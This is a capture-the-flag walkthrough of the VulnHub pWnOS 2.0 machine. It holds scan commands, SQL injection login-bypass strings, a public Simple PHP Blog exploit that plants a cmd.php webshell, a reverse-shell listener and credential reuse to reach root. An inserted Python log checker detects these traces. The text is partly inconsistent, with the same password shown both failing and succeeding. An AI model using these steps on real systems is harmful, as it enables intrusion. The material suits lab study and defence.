VulnHub: pWnOS: 2.0 (Pre-Release)

ratiros01
5 min read · Apr 27, 2021

Initial Foothold

1. Network discovery

nmap -sn 10.10.10.200/24

My target is 10.10.10.100.

2. Port scan

nmap -Pn 10.10.10.100
nmap -Pn -p1000- 10.10.10.100

3. OS and service scan

nmap -A -p22,80 10.10.10.100

4. Vuln scan

nmap --script vuln -p22,80 10.10.10.100

There are directories on the HTTP site, as shown.

Service Enumeration

  • 22/tcp OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)

Connect to SSH

ssh 10.10.10.100

No banner appears.

  • 80/tcp Apache httpd 2.2.17 ((Ubuntu))
1. Nikto scan

nikto -h http://10.10.10.100

There are sub-directories, as listed.

2. Further directory scan with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q

3. Access the site

Note the email ‘admin@isints.com’ in case I need it.

Register on the site.

Follow the activation link.

Log in; nothing comes up.

However, if you supply SQL injection you also get the admin panel, but there’s nothing there anyway.

Here’s my list of tested queries:

1' or 1=1--   -> failed
1' or 1=1-- - -> failed
1' or 1=1--+ -> failed
1' or 1=1# -> succeeded

Another interesting directory is /blog

Viewing the page source revealed that it’s Simple PHP Blog 0.4.0.

Exploitation

1. Search for an existing exploit; I came across this script.

Look up the script number and copy it from searchsploit.

Copy the command.

searchsploit -m 1191

Run the script to test it.

./1191.pl

Now I have the usage.

Since I want a shell, my choice is number 1.

./1191.pl -h http://10.10.10.100/blog -e 1

cmd.php is created and stored in http://10.10.10.100/blog/images/

Access the path

I created cmd.php but didn’t know how to use it, so I looked in the code and found a GET parameter, cmd.

Try the script

http://10.10.10.100/blog/images/cmd.php?cmd=id

It worked.

2. Get the reverse shell

Create a listener on port 443

rlwrap nc -lvp 443

I used this cheat sheet.

The method is to intercept the request with Burp Suite and send it to Repeater.

Copy the command and URL-encode it with the Burp Suite Decoder.

Paste the encoded command.

After my tries, I succeeded with this command.
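From the defender’s side, the webshell and login-bypass steps above leave traces in the Apache access log. What follows is an added example, not part of the original write-up: a small Python checker run over constructed log lines that flags a script requested from an images/upload directory (where the Simple PHP Blog exploit drops cmd.php), a cmd-style query parameter, and the quote-plus-comment SQL injection pattern used at the login form. The directory names, parameter names and log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample Apache combined-log lines modelled on the steps in this
# write-up; IPs, timestamps and the non-attack requests are made up.
SAMPLE_LOG = """\
10.10.10.200 - - [27/Apr/2021:10:01:02 +0000] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.10.200 - - [27/Apr/2021:10:03:40 +0000] "GET /blog/images/cmd.php?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.10.10.200 - - [27/Apr/2021:10:04:05 +0000] "GET /blog/images/cmd.php?cmd=uname%20-a HTTP/1.1" 200 110 "-" "Mozilla/5.0"
10.10.10.200 - - [27/Apr/2021:10:05:00 +0000] "GET /login.php?email=1%27+or+1%3D1%23&pass=x HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.10.201 - - [27/Apr/2021:10:06:00 +0000] "GET /blog/images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "request", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Directories that should only serve static content (assumed names).
STATIC_DIRS = ("/images/", "/uploads/", "/files/")
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl")
CMD_PARAMS = {"cmd", "exec", "command"}
# A quote followed by a numeric tautology or a MySQL comment ("' or 1=1#").
SQLI_RE = re.compile(r"'\s*(or|and)\s+\d+\s*=\s*\d+|'\s*(--|#)", re.IGNORECASE)

def analyse_line(line):
    """Return (ip, path, [reasons]) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote_plus(parts.path).lower()
    query = unquote_plus(parts.query)  # decode %27, %23, '+' before matching
    reasons = []
    if path.endswith(SCRIPT_EXT) and any(d in path for d in STATIC_DIRS):
        reasons.append("script executed from static/upload directory")
    if CMD_PARAMS & {k.lower() for k in parse_qs(parts.query)}:
        reasons.append("command-style parameter")
    if SQLI_RE.search(query):
        reasons.append("sql injection pattern")
    return (m.group("ip"), path, reasons) if reasons else None

def find_suspicious(log_text):
    """Scan a whole log; returns [(line_no, ip, path, reasons), ...]."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        found = analyse_line(line)
        if found:
            hits.append((n,) + found)
    return hits

if __name__ == "__main__":
    for n, ip, path, reasons in find_suspicious(SAMPLE_LOG):
        print(f"line {n}: {ip} {path}: {', '.join(reasons)}")
```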

Privilege Escalation

1. Directory exploration

There are many directories to explore, as listed:

/var/www
/var
/var/logs
/var/backups
/var/mail
/home/
/opt
/tmp

After exploring, I came across some files in /var/www and /var.

Here are the commands.

cd /var/www
ls -la

I came across mysqli_connect.php

cat /var/www/mysqli_connect.php

It’s a MySQL credential.

cd /var
ls -la

I came across another mysqli_connect.php

cat /var/mysqli_connect.php

It’s another MySQL credential.

Before using it to access MySQL, I tried logging in as root in case the password is reused.

su root
password: goodday

Failed!

Another one:

su root
password: goodday
whoami

Now I’m root.
